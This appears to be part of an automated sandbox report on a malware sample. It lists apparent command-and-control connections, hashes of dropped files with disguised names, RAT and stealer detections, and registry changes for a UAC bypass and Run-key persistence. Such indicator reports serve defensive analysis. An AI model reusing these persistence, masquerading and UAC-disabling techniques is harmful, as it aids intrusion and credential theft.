| GB | 216.58.212.206:443 | docs.google.com | tcp |
| US | 8.8.8.8:53 | c.pki.goog | udp |
| GB | 142.250.187.227:80 | c.pki.goog | tcp |
| US | 8.8.8.8:53 | o.pki.goog | udp |
| GB | 142.250.187.227:80 | o.pki.goog | tcp |
| US | 8.8.8.8:53 | drive.usercontent.google.com | udp |
| GB | 216.58.204.65:443 | drive.usercontent.google.com | tcp |
| US | 104.20.3.235:443 | pastebin.com | tcp |
| US | 192.188.88.248:2404 | bash2.accesscam.org | tcp |
| US | 8.8.8.8:53 | mim.no-ip.net | udp |
| US | 8.8.4.4:53 | mim.no-ip.net | udp |
| DE | 3.74.27.83:16872 | 0.tcp.eu.ngrok.io | tcp |
| US | 147.185.221.23:56448 | else-directors.gl.at.ply.gg | tcp |
| FR | 163.172.125.253:333 | | tcp |
| US | 104.20.3.235:443 | pastebin.com | tcp |
| US | 72.167.39.236:443 | | tcp |
| US | 8.8.8.8:53 | tualcaldia.com | udp |
| US | 72.167.39.236:443 | tualcaldia.com | tcp |
| US | 8.8.8.8:53 | 0.tcp.eu.ngrok.io | udp |
| DE | 52.57.120.10:16872 | 0.tcp.eu.ngrok.io | tcp |
| RU | 185.81.68.147:80 | | tcp |
| US | 192.188.88.248:2404 | bash2.accesscam.org | tcp |
| FR | 90.113.178.145:9033 | | tcp |
| US | 104.20.3.235:443 | pastebin.com | tcp |
| US | 192.188.88.248:2404 | bash2.accesscam.org | tcp |
| US | 8.8.8.8:53 | mim.no-ip.net | udp |
| US | 8.8.4.4:53 | mim.no-ip.net | udp |
| DE | 52.57.120.10:16872 | 0.tcp.eu.ngrok.io | tcp |
| FR | 163.172.125.253:333 | | tcp |
| US | 72.167.39.236:443 | tualcaldia.com | tcp |
| US | 104.20.3.235:443 | pastebin.com | tcp |
| US | 72.167.39.236:443 | tualcaldia.com | tcp |
| RU | 185.81.68.147:80 | | tcp |
| DE | 52.57.120.10:16872 | 0.tcp.eu.ngrok.io | tcp |
| US | 104.20.3.235:443 | pastebin.com | tcp |
| US | 192.188.88.248:2404 | bash2.accesscam.org | tcp |
| N/A | 127.0.0.1:53896 | | tcp |
| US | 8.8.8.8:53 | mim.no-ip.net | udp |
| US | 8.8.4.4:53 | mim.no-ip.net | udp |
| FR | 163.172.125.253:333 | | tcp |
| DE | 52.57.120.10:16872 | 0.tcp.eu.ngrok.io | tcp |
| US | 104.20.3.235:443 | pastebin.com | tcp |
| DE | 52.57.120.10:16872 | 0.tcp.eu.ngrok.io | tcp |
| US | 192.188.88.248:2404 | bash2.accesscam.org | tcp |
| US | 104.20.3.235:443 | pastebin.com | tcp |
| N/A | 127.0.0.1:53896 | | tcp |
| US | 192.188.88.248:2404 | bash2.accesscam.org | tcp |
| FR | 163.172.125.253:333 | | tcp |
| DE | 52.57.120.10:16872 | 0.tcp.eu.ngrok.io | tcp |
| US | 104.20.3.235:443 | pastebin.com | tcp |
| TR | 176.232.184.98:1604 | tuna91.duckdns.org | tcp |
| US | 147.185.221.23:56448 | else-directors.gl.at.ply.gg | tcp |
| N/A | 127.0.0.1:53896 | | tcp |
| DE | 52.57.120.10:16872 | 0.tcp.eu.ngrok.io | tcp |
| FR | 90.113.178.145:9033 | | tcp |
| US | 104.20.3.235:443 | pastebin.com | tcp |
| US | 192.188.88.248:2404 | bash2.accesscam.org | tcp |
| FR | 163.172.125.253:333 | | tcp |
| GB | 20.26.156.215:80 | github.com | tcp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.110.133:443 | objects.githubusercontent.com | tcp |
| DE | 52.57.120.10:16872 | 0.tcp.eu.ngrok.io | tcp |
| US | 104.20.3.235:443 | pastebin.com | tcp |
| RU | 176.113.115.215:80 | | tcp |
| US | 8.8.8.8:53 | crl.microsoft.com | udp |
| GB | 2.18.190.80:80 | crl.microsoft.com | tcp |
| US | 8.8.8.8:53 | www.microsoft.com | udp |
| GB | 95.100.245.144:80 | www.microsoft.com | tcp |
| US | 192.188.88.248:2404 | bash2.accesscam.org | tcp |
| DE | 52.57.120.10:16872 | 0.tcp.eu.ngrok.io | tcp |
| GB | 20.26.156.215:443 | github.com | tcp |
| N/A | 192.168.50.1:4782 | tcp | |
| US | 104.20.3.235:443 | pastebin.com | tcp |
| FR | 163.172.125.253:333 | tcp | |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | mim.no-ip.net | udp |
| US | 8.8.4.4:53 | mim.no-ip.net | udp |
| DE | 52.57.120.10:16872 | 0.tcp.eu.ngrok.io | tcp |
| N/A | 127.0.0.1:53896 | tcp | |
| US | 8.8.8.8:53 | mim.no-ip.net | udp |
| US | 8.8.4.4:53 | mim.no-ip.net | udp |
| FR | 90.113.178.145:9033 | tcp | |
| US | 192.188.88.248:2404 | bash2.accesscam.org | tcp |
| US | 8.8.8.8:53 | cdn.glitch.me | udp |
| IE | 18.66.171.56:80 | cdn.glitch.me | tcp |
| N/A | 127.0.0.1:53896 | tcp | |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 147.185.221.23:56448 | else-directors.gl.at.ply.gg | tcp |
| US | 104.20.3.235:443 | pastebin.com | tcp |
| GB | 20.26.156.215:80 | github.com | tcp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | mim.no-ip.net | udp |
| US | 8.8.4.4:53 | mim.no-ip.net | udp |
| US | 104.20.3.235:443 | pastebin.com | tcp |
| TR | 176.232.184.98:1604 | tuna91.duckdns.org | tcp |
| N/A | 127.0.0.1:53896 | tcp | |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | gamwtonxristo.ddns.net | udp |
| US | 104.20.3.235:443 | pastebin.com | tcp |
| CA | 198.50.242.157:80 | 198.50.242.157 | tcp |
| DE | 52.57.120.10:16872 | 0.tcp.eu.ngrok.io | tcp |
| N/A | 10.0.0.113:4782 | tcp | |
| DE | 193.161.193.99:20466 | tcp | |
| DE | 52.57.120.10:16872 | 0.tcp.eu.ngrok.io | tcp |
| FR | 163.172.125.253:333 | tcp | |
| DE | 77.105.161.58:80 | 77.105.161.58 | tcp |
| GB | 89.197.154.116:80 | 89.197.154.116 | tcp |
| GB | 89.197.154.116:7810 | tcp | |
| CA | 198.50.242.157:443 | tcp | |
| RU | 185.215.113.16:80 | tcp | |
| US | 8.8.8.8:53 | sulfux.ddns.net | udp |
| FR | 90.113.179.93:9033 | sulfux.ddns.net | tcp |
| US | 192.188.88.248:2404 | bash2.accesscam.org | tcp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | apleegodfivem.ddns.net | udp |
| RU | 185.215.113.16:80 | tcp | |
| US | 8.8.8.8:53 | 0.tcp.eu.ngrok.io | udp |
| DE | 18.153.198.123:16872 | 0.tcp.eu.ngrok.io | tcp |
| US | 8.8.8.8:53 | 0.tcp.in.ngrok.io | udp |
| CA | 198.50.242.157:443 | tcp | |
| FR | 163.172.125.253:333 | tcp | |
| IN | 13.202.226.61:14296 | 0.tcp.in.ngrok.io | tcp |
| US | 8.8.8.8:53 | 2.tcp.eu.ngrok.io | udp |
| US | 104.20.3.235:443 | pastebin.com | tcp |
| US | 147.185.221.23:56448 | else-directors.gl.at.ply.gg | tcp |
| DE | 18.153.198.123:16872 | 0.tcp.eu.ngrok.io | tcp |
| US | 8.8.8.8:53 | mim.no-ip.net | udp |
| US | 104.20.3.235:443 | pastebin.com | tcp |
| US | 8.8.4.4:53 | mim.no-ip.net | udp |
Files
| MD5 | 5535f86af6f01799056c73acf479c36a |
| SHA1 | 417083fa2d4df6806d984f499cdd4f8cf7102207 |
| SHA256 | 57c08f6bc6fa0b81076a9358dd8dfbe25a918bf5468dc644485b2b31b017f75e |
| SHA512 | 69c0f976f6c433c0c6bd74433b7ba237ad5c8248106f1949e1ed346422bcd0fde35740529e0ff980f1b7fe7b607c030e1e966af2817174b79e595fcd919b33ee |
memory/1660-2957-0x0000000001380000-0x00000000016A4000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\NFL5X40U9rBT.bat
| MD5 | 050b65097d99a3384c91a3af92db83bf |
| SHA1 | f893cd87ffc2acff72c96e655921a9c605d202b5 |
| SHA256 | 949dedc5efb8ecbe51410825b272d12bcfff290ebae6449852606241f77f5bea |
| SHA512 | 9d6fd460d605190691483ac3f773f45c99f80ac80d51c1b92891740776c0fcf169ad67c39c42df69f8b357a78ce76b9bfa40017a610b1c0eca6f5a9b7fd7ddf7 |
C:\Users\Admin\AppData\Local\Temp\gGd6Sc0CVxKo.bat
| MD5 | 2f75915dee93570da94a915b57f00428 |
| SHA1 | d91660e7f70a9dd38223a628be9827a882571780 |
| SHA256 | e31fc98f93e073348edd07d12608edffc6dcdf1c840f24e9b8e127879e540de9 |
| SHA512 | 0cb716b97e9902837978893c2fdfc618a64749bbbbcf7164e1bd6ae9f7bfea656ae8a2e2fa62b171916835ae02854e75f140ae557a3f050fd8bd8a448e0b8225 |
C:\Users\Admin\AppData\Local\Temp\yP7ocPgnzpZX.bat
| MD5 | 8efd953620b528235f220e6bd7ef6b18 |
| SHA1 | e4fe30029e355c2a1f815c88e339882c4acbae70 |
| SHA256 | eb6696427f2fe07cdae5519bd557359dc8c1843b006c8cfabbd9471a6064efa1 |
| SHA512 | dbf7c6437d9acc3afa9bce5dc220a49a7a8fd36c0f1de734ec67b95f33eda2c8dc8c74b0dbaec18faa5da799d1a7dd6ecb634d2351b633376b783488d802abfa |
memory/4704-3139-0x0000000000150000-0x000000000018E000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\txmSbpHR1z93.bat
| MD5 | e786756be477a5d970f1250113955a4c |
| SHA1 | fadd264327514db5f6da8c42d2cc4680fecf90a3 |
| SHA256 | fd302fa9911e7e63c71868961ec83de51efcb5c745a311dd9640f59690215e4d |
| SHA512 | dfd6af7dd6c7018a73406239d62959f616fbc2658e7f2a345dac3143ea93bd794faaa20ec79915cfcd7d4524b1e4a55585bdfa7e6754ff49c337c4ef47e9ec6f |
C:\Users\Admin\AppData\Local\Temp\5CN0SmO4YDaR.bat
| MD5 | eb75a66aba873ae314915140c48db01d |
| SHA1 | e77d18374530a30a5d068ddf887806602e7d6bc4 |
| SHA256 | 256bf7b5c70028d7db9bcbd49f6418a6c8fabf1d783c182e56284555e0541147 |
| SHA512 | 2322f8d4b6db7bcdb3028d33054289e6bbcf8ec2b52ddc198ae4d26cb31204f6050a97538094e0d95ccf53acef12c96cfcc5d00f376dcfc59d1846839f8456ae |
C:\Users\Admin\AppData\Local\Temp\melt.txt
| MD5 | 298802dff6aa26d4fb941c7ccf5c0849 |
| SHA1 | 11e518ca3409f1863ebc2d3f1be9fb701bad52c0 |
| SHA256 | df99fdbdf7b92b29b1bf1ca4283b4de2e04643b9739d2d1089ab5808e8e5665d |
| SHA512 | 0301017dfef1b74855d6535f3fd542257689479cb933c2e8742b5b6b94e26107fa38e7fc21bdb83d45184750eced344856092330fb30a1ebbc24b2b9004c8946 |
C:\Users\Admin\AppData\Local\Temp\zE5EsdTQVLTE.bat
| MD5 | fbfd9369aace198ef80b9fdeab6864b3 |
| SHA1 | a0c9ad74b50e8b23be26d313953116d324e57bcd |
| SHA256 | 89690b44c9c1e557b1d1d37473894d3fb4489cc737a41d96d4aedf94162b675c |
| SHA512 | 54c7ae58f62aa7706ad45753b5c485a3152693c9fbfec8ff215f590e39f19eaf1931721b27239689fb8b696f0b8f8adc966c9f2a17bd1b36e4e7320c60aa8e1f |
memory/536-3331-0x0000000000250000-0x0000000000574000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\RH1PaQhQWwXm.bat
| MD5 | 67b80a39054528fc4f026dbc891309c6 |
| SHA1 | b61c2e7258ef908bb971fa1edcffc7049502a408 |
| SHA256 | 7e058173e15dcff6e2afe27553178dcfd5c539f7f1af932fb9a1a66148d0d403 |
| SHA512 | a7ea28e7455ea91be65c29ca4563d1cc5c0c8ef177c76bc76133fcc8d41a4b9aab43952066e7f58d9dcd7d95d6e259da1a124f3749d45d9647b78267daca7890 |
C:\Users\Admin\AppData\Local\Temp\hrQrQWtmNAup.bat
| MD5 | 13dfac99595ee08f5a0806cd54de0cf2 |
| SHA1 | 8d847d07450fdd0c2888cb9d3d288f8a79f73ddb |
| SHA256 | 6682e60ed1ed0509e6848842d0c36a5ab3fcf7c2d14cbb66d9862b1f24b0fb57 |
| SHA512 | a5b137e6e8a26d28613734d1d106754a56f0a5b8014b7aa14d585887c630619fbab2c3de20be631c26510bfd6c6f7ba8e4cb22490c29d5b7b10d722fbf7a6347 |
memory/2012-3427-0x0000000000D00000-0x0000000001024000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\XxLvY69ABsZF.bat
| MD5 | a59a3e74231a568fcb1e6b2924be89f4 |
| SHA1 | 1f2bad01b6abd0038746980e9ec6c3fb599a50ee |
| SHA256 | 7ebd19c7178b08a4f74576f1f57dc4ce3b69aecafe48186561480ccfaeec825f |
| SHA512 | 09b7f572da9396accb7432e2c43b17da1c32c3661b2e6af78d26b935ba7e490ff32c5e360bcf08bec367474059956f94c7d1809b6cc2862ab60347628ba33435 |
C:\Users\Admin\AppData\Local\Temp\H0JK71MDoDiA.bat
| MD5 | 691c4e0f2823309525711935d3e9d1da |
| SHA1 | 07ffbd5095feca40ace6d835e829332a07cebde3 |
| SHA256 | 457d4cf25cf8b7327f57feb1485a62a308be943a56b1c44e5e97cc4056be091d |
| SHA512 | d4b22625fc7d807a32a2fcc2dcfb4d0ad3fa462c0a5ba4668948ca2ca15f17ae3985a0c429c18bc441b5be9a9681f7ef31510a0d30c80c82b3a331396fa158f7 |
memory/3108-3495-0x0000000001300000-0x0000000001624000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\NLqbDa60jHZY.bat
| MD5 | 813ad27351c64cd255419e999e39194b |
| SHA1 | ae5f8741732626d3859c06eac54ba58a14d3525b |
| SHA256 | 05dc9d7d5eb94d8660ca6717be223c949196e7d343177193af6f5de1dd83620d |
| SHA512 | ae4152e5c9b5b06d1061a11a568218f8e48009a7363f2b6816c2693164c59f509a7827a22603e9cc8f2026ac97700cea5fe3caba4ff0f92d7a60d7a121f46b5e |
memory/3112-3551-0x0000000000900000-0x0000000000C24000-memory.dmp
C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
| MD5 | 5da0a355dcd44b29fdd27a5eba904d8d |
| SHA1 | 1099e489937a644376653ab4b5921da9527f50a9 |
| SHA256 | e7fa9494811b479f00405027a8bad59dccaa410ac439bdd046ed2c440d0e101f |
| SHA512 | 289ac0076045bcb1e8b35d572ed27eca424f718b9ef26d821a5cc7ee372203125a6c516b296044efc23ad4d4bd771e1d875cf74107b9205c5312a6c49d37b0a6 |
memory/5084-3562-0x0000000000810000-0x0000000000B34000-memory.dmp
memory/4956-3612-0x00000000008A0000-0x0000000000BC4000-memory.dmp
C:\Users\Admin\AppData\Roaming\windows updater\windows 3543.exe
| MD5 | d4a776ea55e24d3124a6e0759fb0ac44 |
| SHA1 | f5932d234baccc992ca910ff12044e8965229852 |
| SHA256 | 7ef4d0236c81894178a6cfc6c27920217bea42a3602ad7a6002834718ba7b93c |
| SHA512 | ba9127f7f84e55a37e4eb1dc1a50d10ef044f0b24a23d451187c8d1dedec26d3a37cf78e8763b351ef1e492e26b1ef9b28fc2331591ce1b53c3d76369d100f4b |
memory/4644-3616-0x00000000008E0000-0x0000000000C04000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\S0Ahb7wqiLdU.bat
| MD5 | 9f90cd2f71eb081ca49723618b590f48 |
| SHA1 | f5979dd693e29674534363991a5c81ee72a360a4 |
| SHA256 | ee42c816740cd2041c7fe0468f7428fd867c1fc52385c1fa6678e4344c295fc0 |
| SHA512 | e888bbabb997c7c1a7a9a129b52e945721a4b21a90fd2ff9213518d556a46c8086e4489d333fd39a4db2e900444c65bb4e86e47f5b6f4d11036ac2b29654a4c3 |
C:\Users\Admin\AppData\Local\Temp\hEb9H3hRUfd2.bat
| MD5 | 173ecaead14c1fb024d5ad0931a16c12 |
| SHA1 | 0ba26e25c07445743eb3007465d2f6ad3dffc277 |
| SHA256 | 422b69910e2f28aef577e7692d0c37a95483275b5231bbae845404c1e787eb9e |
| SHA512 | 6c4988dfbc3ab9477b1be1d3362ba79b0a141f7e7a19c967b86e8c95f9ecd65775f30ef78892cec4bd660ae850fc65749aaabd4a126ed71019b601214e7834af |
memory/888-3677-0x0000000000130000-0x0000000000150000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\1gDcq6KwkC4i.bat
| MD5 | 8d1a743f270c76527479866fa8fdf02f |
| SHA1 | db51256fd48ea3021753219dc116f8ec89cbda86 |
| SHA256 | 11df1786f3d18fcb202d46f3ad8ad47e765692dc49dee4efe11b62b6f8c9310c |
| SHA512 | dd7635ddbe2c365e8c2cc0fb4486d270fa5892f6d6ff455c9f7d920ec221cb66f0f4ea88e19c85ee34ce2d5310c6c4ca4a649fdf14b41a30f92f56d81f14ae9f |
memory/2320-3729-0x0000000000AE0000-0x0000000000E04000-memory.dmp
memory/3440-3763-0x0000000000F60000-0x0000000000F9E000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\j6z7JyGJ60PR.bat
| MD5 | a55c1246884622d2d569fc00a60e3e19 |
| SHA1 | 97107e929bbe8601229093e5bbff64dac1123b07 |
| SHA256 | 778c5bd282e7813255e67d8788f485086a451b8157f982f16a978c51bf93b190 |
| SHA512 | 15667d4f0807e0a4f1a52bc5422fedc7184075437cf7b1aeaba8f0174838fa4cb0d1c1dc701c1849f9662363a89640cc5d1ac75d85763230e196c0671de0de01 |
C:\Users\Admin\AppData\Local\Temp\4ZAVHlJm6aW9.bat
| MD5 | bf3b4a3303d4e4271526b7f22f733671 |
| SHA1 | 99ef51352cbd51e9823c19f4c4ecacf9646c74a9 |
| SHA256 | f11f3c82c646b1cfa86729a7e0d5998d5e0c860da226f475f84dd188d8dffd9d |
| SHA512 | 930c928874bef20a0275d34918b03c49ae3bd2f2d1ce20ef60778798b2785d5d634ce01b9d054ed32e4dbae7e9769b17469d67b33ddc8ab4e2382b5d6e91c256 |
memory/4396-3794-0x0000000000990000-0x00000000009A8000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\QZQBLEqosfSN.bat
| MD5 | 0e4d3ee1393415299bffefbf16449903 |
| SHA1 | 26f7be2f645c6ef728a975a07a2e9d119979af38 |
| SHA256 | fef1fb06c66f5c08ae32ed88638c0554db6b35b5c992b21b3748f464845879ce |
| SHA512 | 389c6ff94d4496014cad80ed91f80e647ebd22fb2b690900bf5c7a19b0050a6d110bb616aea602d526713eb89957ea84f52c5ab1a2bb12b54ddcac6e0378b7ae |
memory/3160-3808-0x00000000009F0000-0x0000000000A76000-memory.dmp
C:\Users\Admin\AppData\Roaming\Windows Defender\comctl32.exe
| MD5 | 4e7b96fe3160ff171e8e334c66c3205c |
| SHA1 | ad9dbdfb52d3c2ee9a57fe837605ec233db43a7f |
| SHA256 | e698a786c4dcd964e54903a98bfaa0638ce8f52e02658f1223805c6e3b1ca83c |
| SHA512 | 2e8968ce87a1670ff6b49f92beaee8c7d1b2fd94bc216507e255bb2a54d4073fbbd20b39e188fd40eb049da59bf27f9aed729c390525232e4a904e71e10f9b48 |
memory/1096-3853-0x0000000001390000-0x0000000001416000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\mgfpRTWIUj34.bat
| MD5 | 92d0437f9ef305acfb2e37cf61ab4299 |
| SHA1 | 961cb6a196f31cb251b41c48c59e5b9ac8ac4940 |
| SHA256 | f2933fdc2daebf7b66b1aa76e083a7adb849dc87c2fcd765badd8da39d0c364a |
| SHA512 | a6ad8adb5ed7ddb91e6209c7cefb5733dd97aae1b77dac05401c90b003669b7e798bddd8cd0a84a236965807a6c4da7137e68fe6e1f46111750003188fe5c284 |
memory/484-3867-0x0000000001170000-0x0000000001494000-memory.dmp
memory/1244-3868-0x0000000001120000-0x0000000001444000-memory.dmp
C:\Users\Admin\AppData\Roaming\WindowsLockerZAP\Windows Defender SmartScreen (32 bit).exe
| MD5 | ff8c68c60f122eb7f8473106d4bcf26c |
| SHA1 | 0efa03e7412e7e15868c93604372d2b2e6b80662 |
| SHA256 | 5ff2becf2c56500cb71898f661c863e647a96af33db38d84d7921dc7dbf4f642 |
| SHA512 | ab92ef844a015c3fcbfba313872b922bff54184b25623ed34f4829bd66a95af081cdeefd35425a4d3b9d9085ccf8c25045cf6093d74a5c8c35012c1b7546688e |
memory/3752-3874-0x0000000000370000-0x0000000000694000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\ppDiKTAIxf8s.bat
| MD5 | cc0d7311ca2149f60e102772e1cdf151 |
| SHA1 | 6fa746c971c5533982a04aa10b23d9a4450d7224 |
| SHA256 | 70adf156f70b573664323edc9d5c4a14c925c33685842d78a5a962dc08d8ca93 |
| SHA512 | 1c83bd1edf56f3f01c96bb9559bfaaf476fc630407b00d3a91c0aa6f4ba6c095c040faac0c07c2e1dc2272dea436e84484fb042a9e45bd86b4eb0e800feb9538 |
C:\Users\Admin\AppData\Local\Temp\q55bgR7thNVT.bat
| MD5 | de135cfab7f87be50527bc285b7e66ec |
| SHA1 | 99e2629402f10f6dbe960b14fc823e831774e72a |
| SHA256 | d3e3cb66142ffa4dc11703fec9d15bb64c1d6aeca6cd6232470c5daa27acd230 |
| SHA512 | 23d86cf0bbc4b0fa2e5648f83fdaff7be0ca5a0b92cabe41aad1dc560bb223ece725fd8d9a3ab469ac20aebe3e0c398ebc9e6b94e3e9597e5947205344fd5606 |
C:\Users\Admin\AppData\Local\Temp\X5hI9T69oF0z.bat
| MD5 | e47d6cfe6efa4613c51c12e6a70e1b9d |
| SHA1 | efde6d054092a6316e8ce83de227f574b1a5e027 |
| SHA256 | c0a06c0c32457e2ffa7499a3fa6f769f765ab5c72db8a8b806ddee412806e356 |
| SHA512 | c3769fec0b94c8dc04e648e0a4825cff8d63df1d0a5eedf1af55e23f736485ed8f13fe2dce3d9e4294ab147c5c3106f1bd6fbdb8def04037b7dc82b52a8de888 |
C:\Users\Admin\AppData\Local\Temp\a\FXServer.exe
| MD5 | 991e707e324731f86a43900e34070808 |
| SHA1 | 5b5afd8cecb865de3341510f38d217f47490eead |
| SHA256 | 32d8c2a1bb4d5a515d9eb36c1286b0ac08624c8ea3df0e97f12391558ce81153 |
| SHA512 | 07411dffbc6beff08a901afa8db3af4bc7d214407f7b20a8570e16b3900f512ad8ee2d04e31bb9d870585b9825e9102078f6c40eb6df292f09fffe57eea37f79 |
memory/3780-3953-0x0000000000240000-0x000000000024E000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\a\ciscotest.exe
| MD5 | 0076324b407d0783137badc7600327a1 |
| SHA1 | 29e6cb1f18a43b8e293539d50272898a8befa341 |
| SHA256 | 55c727a9806966ec83f22702c1101c855a004c5658cf60e3c3499f895b994583 |
| SHA512 | 96b08dd1a7abccefabe3568637c17f6ae2c04349488db8dc05b9dcaaaef6a041c36fa4a1f1841096d6622b9775099c7c7eb1497c57581cb444afeb481563cae4 |
memory/2664-3969-0x0000000000800000-0x0000000000812000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\uTBZJw95QmYA.bat
| MD5 | d16ea7346ed37c055a4a03311b659f56 |
| SHA1 | fe6db9db72b7e04f0de9db2dc2ffdefcad8df826 |
| SHA256 | ebdd57723f85a59ac828e58d5f4ca4206c3fa014afd435465b2f988b892bb8d5 |
| SHA512 | 480002fba1f1f429380b2a7c81f26a1226e46a492af103f7af12a2a8c7495f879be27a6bd850e9799e221e19be82bb2b8a84d2388e8d2c372b71d93c9dc90d77 |
memory/948-4015-0x0000000000FE0000-0x0000000001304000-memory.dmp
memory/4340-4028-0x00000000013B0000-0x00000000016D4000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\W0OTT0ZRdELW.bat
| MD5 | fe752131e279b994b7207b3f5d4a3767 |
| SHA1 | 1653cfe79b68844de3bbc7812b2a42f61b42f5d9 |
| SHA256 | 2451595911d8e9aef23573afe78cc2fb78acea35420d7f36b8aea9a12a78a03d |
| SHA512 | f24fe7a679b9f14b7d4e6684e13ec2a80c5406f8471261dffef2a373756ddc33e9a3a7f377993f0683916a713f638a75cf3d064b54643b226c439bb37176f1d2 |
C:\Users\Admin\AppData\Local\Temp\QCGANXGlRZof.bat
| MD5 | 5629f59329611f37428fa42124d79d80 |
| SHA1 | 16776c1fcf26abcba43d81dfb5c10953fb4429ce |
| SHA256 | 16ed3860e2ab444cd9ad1b687650e99c570ab836a405fb3517cd5c0016a17c93 |
| SHA512 | 106c512573c3b5e93e091812f94afadf7a1d92a2f22505a1e2f273b92a4309f6ab94e5e792a99dec8ec0e728d2a4220dc4f974effd5723e320d74f5219f6b7a7 |
C:\Users\Admin\AppData\Local\Temp\3wSQiyOdnYt3.bat
| MD5 | 9ac77a50aafb7fbf78bfbc0f978be6c9 |
| SHA1 | ba0f1146d9727bb299eac05eb51474df81594ce6 |
| SHA256 | f0ed61ae18a9a4af3898eda4272bd5f21b04ce9d3771284061ff927d9b5427c0 |
| SHA512 | 061ebea055dfb993b90a35b5f8fcaa9ed8ff2656188181ebbd5741bb673989388ee3c554caa2749fad513ccd68a6d5aa5f5f4999e2129d6f7127df2577bede96 |
Analysis: behavioral2
Detonation Overview
Submitted
2025-01-26 00:01
Reported
2025-01-26 00:04
Platform
win10v2004-20241007-en
Max time kernel
15s
Max time network
151s
Command Line
Signatures
AsyncRat
Asyncrat family
Detect Vidar Stealer
Detect Xworm Payload
Quasar RAT
Quasar family
Quasar payload
UAC bypass
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
Vidar
Vidar family
Xred
Xred family
Xworm
Xworm family
Async RAT payload
Adds policy Run key to start application
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run | C:\Users\Admin\AppData\Local\Temp\a\ApiUpdater.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\VisualStudioServer = "\"C:\\ProgramData\\Bitdefender\\$77-Bitdefender.exe\"" | C:\Users\Admin\AppData\Local\Temp\a\ApiUpdater.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation | C:\ProgramData\Synaptics\Synaptics.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\._cache_New Text Document mod.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\a\1.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\a\zoom_invitecode=23884232.zoom.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\a\ApiUpdater.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\WScript.exe | N/A |
Executes dropped EXE
Loads dropped DLL
Reads user/profile data of web browsers
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\VisualStudioServer = "\"C:\\ProgramData\\Bitdefender\\$77-Bitdefender.exe\"" | C:\Users\Admin\AppData\Local\Temp\a\ApiUpdater.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Synaptics Pointing Device Driver = "C:\\ProgramData\\Synaptics\\Synaptics.exe" | C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\VisualStudioServer = "\"C:\\ProgramData\\Bitdefender\\$77-Bitdefender.exe\"" | C:\Users\Admin\AppData\Local\Temp\a\ApiUpdater.exe | N/A |
Enumerates connected drives
| Description | Indicator | Process | Target |
| File opened (read-only) | \??\L: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\M: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\E: | C:\Windows\system32\msiexec.exe | N/A |
